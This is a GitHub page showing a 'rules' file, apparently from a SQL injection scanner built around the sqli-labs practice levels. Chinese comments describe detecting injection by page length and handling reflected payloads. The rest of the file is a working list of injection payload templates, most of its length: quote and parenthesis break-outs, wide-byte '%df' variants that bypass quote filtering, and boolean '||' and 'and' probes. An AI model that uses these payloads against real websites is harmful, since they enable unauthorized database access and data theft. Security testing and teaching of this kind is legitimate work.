-
Notifications
You must be signed in to change notification settings - Fork 18
/
rules
62 lines (62 loc) · 1.71 KB
/
rules
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# 注意这里并没有把空格进行URL编码 , 也就是说Requests库在发送的时候可能已经进行了一次编码
# 之所以这么做是因为有的时候 , Payload可能会显示在页面上
# 这样的话 , 可能对我们判断是否注入成功有影响
# 因此想到一个解决方案是将返回页面中的Payload替换为最开始获取正确的页面的时候的参数
# 这样一来 , 就基本上可以解决这个问题
# 这样的话 , 可以通过判断页面的长度来判断是否注入成功
# 如下语句 : 如果返回正常 , 说明猜测成功
# 但是这里还会有一个问题 , 例如29关
# 第29关是将URL中符号转换成了URL编码然后显示出来
# 这个问题暂时还没有解决
# 如果还是按照刚才的思路的话 , 就是将Payload中的特殊字符进行URL编码
# 然后再对content进行替换 , 现在有点忙 , 晚上回来试试
0|()--
0'|()--
0"|()--
0)|()--
0')|()--
0")|()--
0))|()--
0'))|()--
0"))|()--
0)))|()--
#####################################
# 当单引号被过滤(去掉)
0%df'|()--
0%df')|()--
0%df'))|()--
#####################################
# 当双引号被过滤
0%df"|()--
0%df")|()--
0%df"))|()--
#####################################
0'|()|''='1--
0"|()|''='1--
0)|()|''='1--
0')|()|''='1--
0")|()|''='1--
0))|()|''='1--
0'))|()|''='1--
0"))|()|''='1--
0)))|()|''='1--
#####################################
0'||()||''='1
0"||()||''='1
0)||()||''='1
0')||()||''='1
0")||()||''='1
0))||()||''='1
0'))||()||''='1
0"))||()||''='1
0)))||()||''='1
#####################################
1'and()and''='
1"and()and''='
1)and()and''='
1')and()and''='
1")and()and''='
1))and()and''='
1'))and()and''='
1"))and()and''='
1)))and()and''='